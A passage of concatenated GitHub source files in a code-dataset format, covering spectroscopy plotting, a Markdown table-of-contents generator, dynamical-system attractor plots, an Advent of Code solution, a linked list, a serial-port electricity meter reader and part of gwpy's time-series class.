plottingValues = []\n wavelength = wavelength.tolist()\n for i in range(len(definedWavelengths)):\n plottingValues.append(wavelength.index(definedWavelengths[i]))\n\n ### Defines the plotting variables for the sample graph. This uses the returned position indices above.\n ax1.plot(time, intensityValues[plottingValues[0]], '-r',\n time, intensityValues[plottingValues[1]], '-y',\n time, intensityValues[plottingValues[2]], '-g',\n time, intensityValues[plottingValues[3]], '-c',\n time, intensityValues[plottingValues[4]], '-b',\n time, intensityValues[plottingValues[5]], '-m')\n\n ### Sets the ticks and tick labels to the more readable float formats for the decay graph.\n ax1.set_xlabel(\"Time / s\", fontsize=\"medium\", fontweight=\"bold\")\n ax1.set_ylabel(\"Intensity / arb.\", fontsize=\"medium\", fontweight=\"bold\")\n ax1.set_xlim(-1,100)\n \n ### Formatting\n ax1.legend([wavelengthFloat[plottingValues[0]],\n wavelengthFloat[plottingValues[1]],\n wavelengthFloat[plottingValues[2]],\n wavelengthFloat[plottingValues[3]],\n wavelengthFloat[plottingValues[4]],\n wavelengthFloat[plottingValues[5]]],\n title=\"Wavelength / nm\",\n title_fontsize=\"medium\",\n fontsize=\"small\",\n labelspacing=0.7,\n columnspacing=3.0\n )\n\n ### Shows the figure containing the plots with some minor spacing adjustment. 
This code will always\n ### be called when under userChoice = 3, but will be ignored under userChoice = 4. This is because\n ### the latter needs to just save the files continuously.\n plt.subplots_adjust(wspace=0.250, bottom=0.165)\n if saveDialog == True:\n print(\"Drawing plot...\")\n plt.show(block=False)\n\n ### Halts program execution until the user closes the plot window. This then closes all\n ### open figures as a safeguard measure.\n input(\"\\n>>> Press ENTER to resume program...\")\n\n ### Gives user the option to save the figure.\n saveFig = str(input(\"\\n>>> Do you want to save this figure? (y/n): \"))\n if saveFig.lower() == \"y\":\n fileName = str(input(\"\\n>>> Enter a filename: \"))\n fileName = str(getcwd() + \"\\\\savedGeneralPlots\\\\\" + fileName + \".png\")\n plt.savefig(fileName, format=\"png\")\n \n ### Saves the figure without creating the dialog options for the user to go through. This path is used\n ### for bulk plot saving and is only called under userChoice = 4.\n elif saveDialog == False:\n fileName = directoryFiles[datasetChoice-1][:-4]\n fileName = str(getcwd() + \"\\\\savedGeneralPlots\\\\\" + fileName + \".png\")\n plt.savefig(fileName, format=\"png\")\n\n plt.close(\"all\")\n return 1\n\n\n### Loop call to plotSingleDataset function which will generate graphs iteratively with the\n### different available datasets.\ndef generatePlots(directoryFiles, colormap=\"Spectral_r\"):\n for i in range(len(directoryFiles)):\n print(\"Plotting: \" + str(directoryFiles[i][:-4]))\n plotSingleDataset(i + 1, directoryFiles, saveDialog=False, colormap=colormap) # plotSingleDataset expects a 1-indexed dataset choice\n print(\"Finished Plotting: \" + str(directoryFiles[i][:-4] + \"\\n\"))\n return 1\n\n\n### Assigns the wavelengths to use as a list and returns them for use as the general 1D plot.\n### This is not a necessary assignment but allows the user to choose whether they want specific\n### wavelengths or whether they want the general equally-spaced wavelengths.\ndef getWavelengths():\n wavelengthList = []\n round = [\"first\", \"second\", \"third\", \"fourth\", \"fifth\", \"sixth\"]\n for i in range(6):\n try:\n wavelengthValue = float(input(\"\\n>>> Enter the {round} wavelength in full: \".format(round=round[i])))\n wavelengthList.append(wavelengthValue)\n except ValueError:\n print(\"\\nThe values entered do not belong to the float type.\")\n print(\"Please repeat the process and enter float values.\")\n print(\"Returning to main menu.\")\n return 0\n return wavelengthList\n\n","repo_name":"nicholas-lau/TAplotS","sub_path":"figurePlottingFunctions.py","file_name":"figurePlottingFunctions.py","file_ext":"py","file_size_in_byte":13955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10632314417","text":"import re\n\n\nclass ContentErrorException(Exception):\n pass\n\n\ndef next_no_blank(contents):\n for index, single_line in enumerate(contents):\n if single_line.strip():\n return index\n\n\ndef next_blank(contents):\n for index, single_line in enumerate(contents):\n if not single_line.strip():\n return index\n\n\nclass Toggle(object):\n def __init__(self, url_prefix, content=None, filename=None, match_rules=None, sub_rules=None):\n if not content and not filename:\n raise ContentErrorException(\"Please pass in some content to transfer\")\n elif content is not None:\n self.content = content\n else:\n self.filename = filename\n self.content = open(filename).readlines()\n\n self.url_prefix = url_prefix\n self.sub_rules = sub_rules or {\n \" \": \"-\",\n \"/\": \"\",\n 
\"\\.\": \"\", # 正则表达式字符需要转义\n \"`\": \"\",\n \"\\(\": \"\",\n \"\\)\": \"\",\n \"[A-Z]\": \"lambda x: x.group().lower()\" # 转换成小写\n }\n self.match_rules = match_rules or {\n \"===\": \"- \",\n '---': \" - \"\n }\n self.default_start = [\"Contents\\n\", \"===\\n\", \"\\n\"]\n self.default_end = [\"Contents Created by [Toggle](https://github.com/Microndgt/toggle)\\n\"]\n\n def parse(self, contents):\n _last = None\n for line in contents:\n if line.startswith(tuple(self.match_rules.keys())):\n # 匹配到了,但是没有_last或者_last为空则报错\n if not _last or not _last.strip():\n raise ContentErrorException(\"Markdown Content maybe wrong!\")\n yield _last, line[:3]\n _last = line\n\n def format(self, line, _class):\n origin_line = line\n for match, repl in self.sub_rules.items():\n line = re.sub(match, eval(repl) if repl.startswith(\"lambda\") else repl, line)\n url_line = \"[{}]({})\\n\".format(origin_line.strip(), self.url_prefix + \"#\" + line.strip())\n return self.match_rules[_class] + url_line\n\n def update(self):\n\n content_start = next_no_blank(self.content)\n if self.content[content_start] != self.default_start[0]:\n print(\"didn't find a content to update\")\n\n real_content_start = next_no_blank(self.content[content_start + 2:]) + content_start + 1\n real_content_end = next_blank(self.content[real_content_start + 1:]) + real_content_start + 1\n\n body_start = next_no_blank(self.content[real_content_end + 1:]) + real_content_end + 1\n\n body = self.content[body_start:]\n contents = self._toggle(body)\n contents.extend(body)\n return contents\n\n def generate(self):\n contents = self._toggle(self.content)\n contents.extend(self.content)\n return contents\n\n def _toggle(self, _contents=None):\n if not _contents:\n print(\"data is empty\")\n return []\n\n if _contents[0] == self.default_start[0]:\n print(\"already has a content\")\n return []\n\n _results = self.default_start\n\n _matched = False\n try:\n for match_line, matcher in self.parse(_contents):\n _matched = True\n line = self.format(match_line, matcher)\n _results.append(line)\n except ContentErrorException as e:\n print(str(e))\n return []\n\n if not _matched:\n return []\n\n _results.append(\"\\n\")\n _results.extend(self.default_end)\n _results.append(\"\\n\")\n return _results\n\n\nif __name__ == \"__main__\":\n toggle = Toggle(filename='./README.md',\n url_prefix='https://github.com/Microndgt/toggle')\n print(''.join(toggle.update()))\n\n\n\n","repo_name":"Microndgt/toggle","sub_path":"toggle.py","file_name":"toggle.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"39543194252","text":"from AEMG.data_utils import *\nfrom AEMG.dynamics_utils import *\nfrom AEMG.mg_utils import *\n\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nimport os\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--experiment',help='Directory of results inside output/',type=str,default='pendulum_lqr1k')\n parser.add_argument('--id', type=str, default=\"\")\n parser.add_argument('--print', action='store_true')\n parser.add_argument('--output_dir',type=str, default=\"\")\n parser.add_argument('--labels_file',help=\"Success/Failure labels inside output/\",type=str, default='')\n args = parser.parse_args()\n\n if args.id == \"\":\n config_fnames = os.listdir(os.path.join(\"output/\",args.experiment))\n else:\n config_fnames = 
[args.id]\n\n print(\"Assuming all configs have the same dataset.\")\n config_fname = os.path.join(\"output\",args.experiment,config_fnames[0], \"config.txt\")\n with open(config_fname, 'r') as f:\n config = eval(f.read())\n assert config['low_dims'] == 2, \"Only 2D systems supported\"\n\n attractors = None\n if config['system'] == 'pendulum':\n attractors = np.array([[-2.1, 0.0], [0.0, 0.0], [2.1, 0.0]])\n elif config['system'] == 'bistable':\n attractors = np.array([[-1.39]+[0.0]*9, [1.39]+[0.0]*9])\n elif config['system'] == 'cartpole':\n attractors = np.array([[0.0, 0.0, 0.0, 0.0],\n [1.0, np.pi, 0.0, 0.0],\n [-1.0, -np.pi, 0.0, 0.0]])\n else:\n if args.labels_file == '':\n print(\"No labels file provided\")\n exit(0)\n else:\n trajectories = TrajectoryDataset(config, os.path.join(\"output\", args.labels_file))\n attractors = trajectories.get_attracting_final_points()\n \n for fname in tqdm(config_fnames):\n config_fname = os.path.join(\"output\",args.experiment,fname, \"config.txt\")\n\n with open(config_fname, 'r') as f:\n config = eval(f.read())\n \n dynamics = DynamicsUtils(config)\n\n try:\n mg_out_utils = MorseGraphOutputProcessor(config)\n except (FileNotFoundError, ValueError): # 'except A or B' would only ever catch A\n exit(0)\n\n # setting the size of the plot\n fig_w=8\n fig_h=8\n fig, ax = plt.subplots(figsize=(fig_w, fig_h))\n lower_bounds = [-1,-1]\n upper_bounds = [1,1]\n d1=0\n d2=1\n fontsize=16\n tick=5\n plt.xticks(fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n ax.set_xlim([lower_bounds[d1], upper_bounds[d1]])\n ax.set_ylim([lower_bounds[d2], upper_bounds[d2]])\n plt.xticks(np.linspace(lower_bounds[d1], upper_bounds[d1], tick))\n plt.yticks(np.linspace(lower_bounds[d2], upper_bounds[d2], tick))\n ax.set_xlabel(str(d1))\n ax.set_ylabel(str(d2))\n ax.xaxis.label.set_size(fontsize)\n ax.yaxis.label.set_size(fontsize)\n\n if args.labels_file == '':\n attractors = dynamics.system.transform(attractors)\n\n for i in range(len(attractors)):\n attractor = attractors[i]\n zt = dynamics.encode(attractor)\n plt.scatter(zt[0], zt[1], color='r', marker='x',s=100, label='GT Attractor' if i==0 else None)\n \n all_attractor_centers = []\n for i in range(mg_out_utils.get_num_attractors()):\n attractor_tiles = mg_out_utils.get_corner_points_of_attractor(mg_out_utils.attractor_nodes[i])\n attractor_mean_corner_points = np.mean(attractor_tiles, axis=0)\n attractor_center = (attractor_mean_corner_points[:config['low_dims']] + attractor_mean_corner_points[config['low_dims']:]) / 2.0\n if args.print:\n print(\"Obtained Attractor {}:\".format(i))\n print(dynamics.system.inverse_transform(dynamics.decode(attractor_center)))\n for j in range(attractor_tiles.shape[0]):\n cp_low = attractor_tiles[j, :config['low_dims']]\n cp_high = attractor_tiles[j, config['low_dims']:]\n tile_center = (cp_low + cp_high) / 2.0\n plt.scatter(tile_center[0], tile_center[1], color='b', s = 100./attractor_tiles.shape[0], marker='.',label='MG Attractor' if i==0 and j==0 else None)\n \n plt.legend(loc='best')\n \n if args.output_dir:\n plt.savefig(os.path.join(args.output_dir,fname+\"_attractors.png\"))\n else:\n plt.savefig(os.path.join(config['output_dir'], \"attractors.png\"))\n plt.close()\n","repo_name":"aravindsiv/AEMG","sub_path":"examples/visualize_attractors.py","file_name":"visualize_attractors.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"37997324046","text":"import os\nfrom colorama import Fore\n\nprint(os.getcwd())\n\nwith 
open('input.txt') as input:\n lines = input.readlines()\n\ndef find_at_most_100000(lines):\n dir_sizes = dict()\n filenames = set()\n stack = []\n\n for line in lines:\n #print(Fore.LIGHTYELLOW_EX + 'dir_sizes', dir_sizes)\n line = line.strip('\\n')\n print(Fore.RED + 'stack', stack)\n\n # command\n if line.startswith('$'):\n print(Fore.GREEN + 'command', line)\n # cd\n if line.startswith('$ cd'):\n if line == '$ cd ..':\n stack.pop()\n elif line.startswith('$ cd /'):\n if line == '$ cd /':\n print('back to root')\n stack = ['/']\n else:\n stack = line[5:].split('/')[1:]\n stack.insert(0, '/')\n print('ABSOLUTE PATH', stack)\n elif line.startswith('$ cd '):\n stack.append(line[5:])\n else: #output\n # file\n print(Fore.CYAN + line)\n file = '/'.join(stack) + '/' + line.split(' ')[1]\n if line.split(' ')[0] == 'dir':\n pass\n else: # file\n #print('file_size', line.split()[0])\n print('filepath', file)\n #print('filenames', filenames)\n file_size = int(line.split(' ')[0])\n if file not in filenames:\n filenames.add(file)\n # add to every dir in stack\n for i, dir in enumerate(stack): # get the full path\n dir = '/'.join(stack[:i + 1])\n dir_sizes[dir] = dir_sizes.get(dir, 0) + file_size\n total = 0 # running total of directories of size at most 100000\n\n # total space is 70000000\n unused_space = 70000000 - dir_sizes['/']\n smallest_after_30000000 = float('inf')\n for i, (k, v) in enumerate(dir_sizes.items()):\n if v + unused_space >= 30000000:\n smallest_after_30000000 = min(smallest_after_30000000, v)\n print(k, v)\n if v <= 100000:\n total += v\n print('smallest after 30000000', smallest_after_30000000)\n \n #for filename in filenames:\n # print(filename)\n #print(dir_sizes)\n #print(filenames)\n print('total used', dir_sizes['/'])\n return total\n\n\n#print(find_at_most_100000(lines[:50]))\n# 1325919 is the answer\n# 48,381,165 is the total space\nprint('at most 100000', find_at_most_100000(lines))\n","repo_name":"AlexHappyCode/AdventOfCode2022","sub_path":"day7/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25550629396","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\nclass SLL:\n def __init__(self):\n self.head = None\n\n def insert_last(self, data):\n newNode = Node(data)\n\n if self.head is None:\n self.head = newNode\n return\n \n currentNode = self.head\n while currentNode.next:\n currentNode = currentNode.next\n\n currentNode.next = newNode\n\n def insert_first(self, data):\n newNode = Node(data)\n\n if self.head is None:\n self.head = newNode\n return\n \n newNode.next = self.head\n self.head = newNode\n\n def search(self, key):\n currentNode = self.head\n while currentNode:\n if currentNode.data == key:\n return True\n currentNode = currentNode.next\n return False\n \n def insert_after(self, key, data):\n currentNode = self.head\n while currentNode:\n if currentNode.data == key:\n newNode = Node(data)\n newNode.next = currentNode.next\n currentNode.next = newNode\n return True\n currentNode = currentNode.next\n return False\n \n def insert_before(self, key, data):\n if self.head is None:\n return False\n if self.head.data == key:\n newNode = Node(data)\n newNode.next = self.head\n self.head = newNode\n return True\n currentNode = self.head\n while currentNode.next:\n if currentNode.next.data == key:\n newNode = Node(data)\n newNode.next = currentNode.next\n currentNode.next = newNode\n return True\n currentNode = 
currentNode.next\n return False\n \n def delete_nth_occurence(self, key, n):\n currentNode = self.head\n count = 1\n prev = None\n while currentNode:\n if currentNode.data == key:\n if count == n:\n if prev is None:\n self.head = currentNode.next\n else:\n prev.next = currentNode.next\n return True\n count += 1\n prev = currentNode\n currentNode = currentNode.next\n return False\n \n def delete_first(self):\n if self.head is None:\n return False\n self.head = self.head.next\n return True\n \n def delete_last(self):\n if self.head is None:\n return False\n if self.head.next is None:\n self.head = None\n return True\n currentNode = self.head\n while currentNode.next.next:\n currentNode = currentNode.next\n currentNode.next = None\n return True\n \n def delete_all_occurences(self, key):\n if self.head is None:\n return False\n while self.head and self.head.data == key:\n self.head = self.head.next\n currentNode = self.head\n while currentNode and currentNode.next: # guard: the list may be empty after removing matching heads\n if currentNode.next.data == key:\n currentNode.next = currentNode.next.next\n else:\n currentNode = currentNode.next\n return True\n \n def print_list(self):\n if self.head is None:\n print('List is empty')\n return\n currentNode = self.head\n while currentNode:\n print(currentNode.data, end=\" -> \")\n currentNode = currentNode.next\n print()\n \n\nsll = SLL()\n\nsll.insert_last(1)\nsll.insert_last(2)\nsll.insert_last(3)\nsll.insert_last(4)\nsll.insert_last(5)\nsll.insert_last(6)\nsll.insert_last(7)\n\nsll.insert_first(0)\nsll.insert_first(0)\nsll.insert_first(0)\n\nsll.print_list()\n\nprint(sll.search(0))\nprint(sll.search(1))\nprint(sll.search(2))\nprint(sll.search(3))\nprint(sll.search(4))\n\nprint(sll.delete_nth_occurence(0, 1))\nprint(sll.delete_nth_occurence(0, 1))\nprint(sll.delete_nth_occurence(0, 1))\n\nsll.print_list()\n\nprint(sll.delete_first())\nprint(sll.delete_first())\nprint(sll.delete_first())\n\nsll.print_list()\n\nprint(sll.delete_last())\nprint(sll.delete_last())\nprint(sll.delete_last())\n\nsll.print_list()\n\nprint(sll.delete_all_occurences(1))\n\nsll.print_list()","repo_name":"Ashrockzzz2003/Data_Structures_and_Algorithms","sub_path":"linear/linked_list/singly_linked_list.py","file_name":"singly_linked_list.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32974768393","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport serial\n\nclass ReadMsg():\n\tdef __init__(self):\n\t\t# assume initialization succeeds\n\t\tself.status = True\n\t\t# initialize the serial port\n\t\ttry:\n\t\t\tself.ser = serial.Serial(\n\t\t\t#\t'/dev/ttyAMA0',\t\t\t\t\t# serial device on Linux; on Windows use COM1 etc.\n\t\t\t#\t'/dev/ttyUSB0',\n\t\t\t\t'COM3',\n\t\t\t\tbaudrate=2400,\t\t\t\t\t# set to the meter's default baud rate\n\t\t\t\tbytesize=serial.EIGHTBITS,\t\t# 8 data bits\n\t\t\t\tparity=serial.PARITY_EVEN,\t\t# even parity, as required by DL/T645-2007 meters\n\t\t\t\tstopbits=serial.STOPBITS_ONE,\t# 1 stop bit\n\t\t\t\ttimeout=0.5\t\t\t\t\t\t# read timeout in seconds\n\t\t\t\t)\n\t\texcept:\n\t\t\t# mark initialization as failed\n\t\t\tself.status = False\n\n\t\t# initialize the meter dictionary: room -> [address, energy, last settlement energy]\n\t\tself.dianbiao = 
{\n\t\t\t\t'201':['010097796152','-1','-1'],\n\t\t\t\t'202':['010126762145','-1','-1'],\n\t\t\t\t'301':['010097796152','-1','-1'],\n\t\t\t\t'302':['010126762145','-1','-1'],\n\t\t\t\t'401':['010097796152','-1','-1'],\n\t\t\t\t'402':['010126762146','-1','-1'],\n\t\t\t\t'501':['010097796153','-1','-1'],\n\t\t\t\t'502':['010126762145','-1','-1'],\n\t\t\t\t'601':['010097796152','-1','-1'],\n\t\t\t\t'602':['010126762145','-1','-1'],\n\t\t\t\t'701':['010097796152','-1','-1'],\n\t\t\t\t'702':['010097796151','-1','-1'],\n\t\t\t\t'801':['010097796152','-1','-1'],\n\t\t\t\t'802':['010126762145','-1','-1'],\n\t\t\t\t'901':['010097796152','-1','-1'],\n\t\t\t\t'902':['010126762145','-1','-1'],\n\t\t\t\t'1001':['010097796152','-1','-1'],\n\t\t\t\t'1002':['010126762145','-1','-1'],\n\t\t\t\t'1101':['010097796152','-1','-1'],\n\t\t\t\t'1102':['010097796152','-1','-1'],\n\t\t\t\t'1201':['010097796151','-1','-1'],\n\t\t\t\t'1202':['010126762145','-1','-1'],\n\t\t\t\t'1301':['010097796152','-1','-1'],\n\t\t\t\t'1302':['010126762145','-1','-1'],\n\t\t\t\t'1401':['010097796152','-1','-1'],\n\t\t\t\t'1402':['010126762145','-1','-1'],\n\t\t\t\t'1501':['010097796152','-1','-1'],\n\t\t\t\t'1502':['010097796152','-1','-1']\n\t\t\t\t}\n\n\t\t# tuples storing the data-block read commands\n\t\tself.zuheyougong = ('0x33','0x33','0x33','0x33')\t\t\t\t# combined active energy\n\t\tself.zhengxiang = ('0x33','0x33','0x34','0x33')\t\t\t\t\t# forward active energy\n\t\tself.zuhejiesuan1 = ('0x34','0x33','0x33','0x33')\t\t\t\t# combined active energy, 1 settlement day ago\n\t\tself.zxjiesuan1 = ('0x34','0x33','0x34','0x33')\t\t\t\t\t# forward active energy, 1 settlement day ago\n\t\tself.zuhejiesuan2 = ('0x35','0x33','0x33','0x33')\t\t\t\t# combined active energy, 2 settlement days ago\n\t\tself.zxjiesuan2 = ('0x35','0x33','0x34','0x33')\t\t\t\t\t# forward active energy, 2 settlement days ago\n\n\tdef CreatMsg(self,list,tuple):\n\t\tmsg = [hex(x) for x in bytes.fromhex(list[0])]\t# address: parse the hex string into bytes\n\t\tmsg.reverse()\t\t\t\t\t\t# little-endian first\n\t\tmsg.insert(0,'0x68')\t\t\t\t# frame starts with 68H\n\t\tmsg.append('0x68')\t\t\t\t\t# 68H again after the address field\n\t\tmsg.append('0x11')\t\t\t\t\t# control code 11H means read data\n\t\tmsg.append('0x04')\t\t\t\t\t# data field length, 4 bytes\n\t\tfor x in tuple : msg.append(x)\t\t# append the data-block command\n\t\tmsg.append(hex(sum([int(x,16) for x in msg])&0x00000000FF))\t# checksum\n\t\tmsg.append('0x16')\n\t\tmsg=bytes([int(x,16) for x in msg])\t\t# convert the list back to a byte string\n\t\treturn msg\n\n\tdef DecodeMsg(self,by):\t\t\t\t\t\t\t\t\t\t\t# by is a byte string\n\t\tmsg = [x for x in bytes(by)]\t\t\t\t\t\t\t\t# convert to a list of byte values\n\t\twhile msg[0] != 0x68:\tmsg.pop(0)\t\t\t\t\t\t\t# strip the leading wake-up bytes\n\t\t# verify the checksum; return False if it is wrong\n\t\tif msg[-2] != (sum(x for x in msg[:-2])&0x00000000FF):\t\t# compute the checksum\n\t\t\treturn False\n\t\t\n\t\taddress = msg[1:7]\t\t\t\t\t\t\t\t\t\t\t# extract the meter address\n\t\taddress.reverse()\t\t\t\t\t\t\t\t\t\t\t# big-endian first\n\t\taddress = [(x>>4&0x0F)*10+(x&0x0F) for x in address]\t\t# BCD decoding formula\n\t\taddress = ''.join(str(x) for x in address)\n\t\tif msg[8] == 0x91 :\n\t\t\tdl = msg[10:-2]\n\t\t\tdl.reverse()\n\t\t\tdl = [x-0x33 for x in dl]\t\t\t\t\t\t\t\t# receiver subtracts 0x33 from each byte\n\t\t\tdl = [(x>>4&0x0F)*10+(x&0x0F) for x in dl]\t\t\t\t# BCD decoding formula\n\t\t\tresult = 0.0\n\t\t\tfor x in dl[:-4]:\t\t\t\n\t\t\t\tresult = result*100+x\n\t\t\treturn address,result/100\n\t\treturn address\n\n\tdef send(self):\n\t\tif self.ser.isOpen():\n\t\t\tpass\n\t\telse:\n\t\t\tself.ser.open()\n\t\t# start reading the meters\n\t\tfor k,v in self.dianbiao.items():\n\t\t\t# read forward active energy\n\t\t\tself.ser.write(self.CreatMsg(self.dianbiao[k],self.zhengxiang))\n\t\t\ts = self.ser.readline()\n\t\t\tif s == b'':\n\t\t\t\tself.dianbiao[k][1] = 'failed'\n\t\t\telse:\n\t\t\t\tself.dianbiao[k][1] = 
self.DecodeMsg(s)[1]\n\t\t\t# read forward active energy of the previous settlement day\n\t\t\tself.ser.write(self.CreatMsg(self.dianbiao[k],self.zxjiesuan1))\n\t\t\ts = self.ser.readline()\n\t\t\tif s == b'':\n\t\t\t\tself.dianbiao[k][2] = 'failed'\n\t\t\telse:\n\t\t\t\tself.dianbiao[k][2] = self.DecodeMsg(s)[1]\n\t\tself.ser.close()\n\n\tdef achieve(self):\n\t\t# open the serial port\n\t\tif self.ser.isOpen():\n\t\t\tpass\n\t\telse:\n\t\t\tself.ser.open()\n\t\tfor room,data in self.dianbiao.items():\n\t\t\t# read forward active energy\n\t\t\tself.ser.write(self.CreatMsg(self.dianbiao[room],self.zhengxiang))\n\t\t\ts = self.ser.read()\n\t\t\tif s != b'':\n\t\t\t\twhile(ord(s) != 0x68):\n\t\t\t\t\ts = self.ser.read()\n\t\t\t\tfor i in range(8):\n\t\t\t\t\ts += self.ser.read()\n\t\t\t\tL = self.ser.read()\n\t\t\t\ts += L\n\t\t\t\tfor i in range(ord(L)+2):\n\t\t\t\t\ts += self.ser.read()\n\t\t\t\tresult = self.DecodeMsg(s)\n\t\t\t\tif result != False:\n\t\t\t\t\tself.dianbiao[room][1] = result[1]\n\t\t\t\telse:\n\t\t\t\t\tself.dianbiao[room][1] = 'failed'\n\t\t\telse:\n\t\t\t\tself.dianbiao[room][1] = 'failed'\n\t\t\tself.ser.reset_input_buffer()\n\t\t\t# read forward active energy of the previous settlement day\n\t\t\tself.ser.write(self.CreatMsg(self.dianbiao[room],self.zxjiesuan1))\n\t\t\ts = self.ser.read()\n\t\t\tif s != b'':\n\t\t\t\twhile(ord(s) != 0x68):\n\t\t\t\t\ts = self.ser.read()\n\t\t\t\tfor i in range(8):\n\t\t\t\t\ts += self.ser.read()\n\t\t\t\tL = self.ser.read()\n\t\t\t\ts += L\n\t\t\t\tfor i in range(ord(L)+2):\n\t\t\t\t\ts += self.ser.read()\n\t\t\t\tresult = self.DecodeMsg(s)\n\t\t\t\tif result != False:\n\t\t\t\t\tself.dianbiao[room][2] = result[1]\n\t\t\t\telse:\n\t\t\t\t\tself.dianbiao[room][2] = 'failed'\n\t\t\telse:\n\t\t\t\tself.dianbiao[room][2] = 'failed'\n\t\t\tself.ser.reset_input_buffer()\n\t\t# close the serial port\n\t\tself.ser.close()\n\t\n\tdef __del__(self):\n\t\tif self.ser.isOpen():\n\t\t\tself.ser.close() \n\t\tprint('Serial port closed!')","repo_name":"lwpo2008/WattMeter","sub_path":"wattmeter.py","file_name":"wattmeter.py","file_ext":"py","file_size_in_byte":5724,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"13042059543","text":"import sys\nimport warnings\nfrom collections import OrderedDict\nfrom math import ceil\n\nimport numpy\n\nfrom astropy import units\nfrom astropy.io import registry as io_registry\n\nfrom gwosc.api import DEFAULT_URL as GWOSC_DEFAULT_HOST\n\nfrom ..types import Series\nfrom ..detector import (Channel, ChannelList)\nfrom ..segments import SegmentList\nfrom ..time import (Time, LIGOTimeGPS, gps_types, to_gps)\nfrom ..utils import gprint\n\n__author__ = 'Duncan Macleod '\n\n__all__ = ['TimeSeriesBase', 'TimeSeriesBaseDict', 'TimeSeriesBaseList']\n\n\n_UFUNC_STRING = {\n 'less': '<',\n 'less_equal': '<=',\n 'equal': '==',\n 'greater_equal': '>=',\n 'greater': '>',\n}\n\n\n# -- utilities ----------------------------------------------------------------\n\ndef _format_time(gps):\n if isinstance(gps, gps_types):\n return float(gps)\n if isinstance(gps, Time):\n return gps.gps\n return gps\n\n\ndef _dynamic_scaled(scaled, channel):\n \"\"\"Determine default for scaled based on channel name\n\n This is mainly to work around LIGO not correctly recording ADC\n scaling parameters for most of Advanced LIGO (through 2023).\n Scaling parameters for H0 and L0 data are also not correct\n starting in mid-2020.\n\n Parameters\n ----------\n scaled : `bool`, `None`\n the scaled argument as given by the user\n\n channel : `str`\n the name of the channel to be read\n\n Returns\n -------\n scaled : `bool`\n `False` if channel is from LIGO, otherwise `True`\n\n 
Examples\n --------\n >>> _dynamic_scaled(None, \"H1:channel\")\n False\n >>> _dynamic_scaled(None, \"V1:channel\")\n True\n \"\"\"\n if scaled is not None:\n return scaled\n return not str(channel).startswith((\"H0\", \"L0\", \"H1\", \"L1\"))\n\n\n# -- TimeSeriesBase------------------------------------------------------------\n\nclass TimeSeriesBase(Series):\n \"\"\"An `Array` with time-domain metadata.\n\n Parameters\n ----------\n value : array-like\n input data array\n\n unit : `~astropy.units.Unit`, optional\n physical unit of these data\n\n t0 : `~gwpy.time.LIGOTimeGPS`, `float`, `str`, optional\n GPS epoch associated with these data,\n any input parsable by `~gwpy.time.to_gps` is fine\n\n dt : `float`, `~astropy.units.Quantity`, optional, default: `1`\n time between successive samples (seconds), can also be given inversely\n via `sample_rate`\n\n sample_rate : `float`, `~astropy.units.Quantity`, optional, default: `1`\n the rate of samples per second (Hertz), can also be given inversely\n via `dt`\n\n times : `array-like`\n the complete array of GPS times accompanying the data for this series.\n This argument takes precedence over `t0` and `dt` so should be given\n in place of these if relevant, not alongside\n\n name : `str`, optional\n descriptive title for this array\n\n channel : `~gwpy.detector.Channel`, `str`, optional\n source data stream for these data\n\n dtype : `~numpy.dtype`, optional\n input data type\n\n copy : `bool`, optional, default: `False`\n choose to copy the input data to new memory\n\n subok : `bool`, optional, default: `True`\n allow passing of sub-classes by the array generator\n \"\"\"\n _default_xunit = units.second\n _print_slots = ('t0', 'dt', 'name', 'channel')\n DictClass = None\n\n def __new__(cls, data, unit=None, t0=None, dt=None, sample_rate=None,\n times=None, channel=None, name=None, **kwargs):\n \"\"\"Generate a new `TimeSeriesBase`.\n \"\"\"\n # parse t0 or epoch\n epoch = kwargs.pop('epoch', None)\n if epoch is not None and t0 is not None:\n raise ValueError(\"give only one of epoch or t0\")\n if epoch is None and t0 is not None:\n kwargs['x0'] = _format_time(t0)\n elif epoch is not None:\n kwargs['x0'] = _format_time(epoch)\n # parse sample_rate or dt\n if sample_rate is not None and dt is not None:\n raise ValueError(\"give only one of sample_rate or dt\")\n if sample_rate is None and dt is not None:\n kwargs['dx'] = dt\n # parse times\n if times is not None:\n kwargs['xindex'] = times\n\n # generate TimeSeries\n new = super().__new__(cls, data, name=name, unit=unit,\n channel=channel, **kwargs)\n\n # manually set sample_rate if given\n if sample_rate is not None:\n new.sample_rate = sample_rate\n\n return new\n\n # -- TimeSeries properties ------------------\n\n # rename properties from the Series\n t0 = Series.x0\n dt = Series.dx\n span = Series.xspan\n times = Series.xindex\n\n # -- epoch\n # this gets redefined to attach to the t0 property\n @property\n def epoch(self):\n \"\"\"GPS epoch for these data.\n\n This attribute is stored internally by the `t0` attribute\n\n :type: `~astropy.time.Time`\n \"\"\"\n try:\n return Time(self.t0, format='gps', scale='utc')\n except AttributeError:\n return None\n\n @epoch.setter\n def epoch(self, epoch):\n if epoch is None:\n del self.t0\n elif isinstance(epoch, Time):\n self.t0 = epoch.gps\n else:\n try:\n self.t0 = to_gps(epoch)\n except TypeError:\n self.t0 = epoch\n\n # -- sample_rate\n @property\n def sample_rate(self):\n \"\"\"Data rate for this `TimeSeries` in samples per second (Hertz).\n\n 
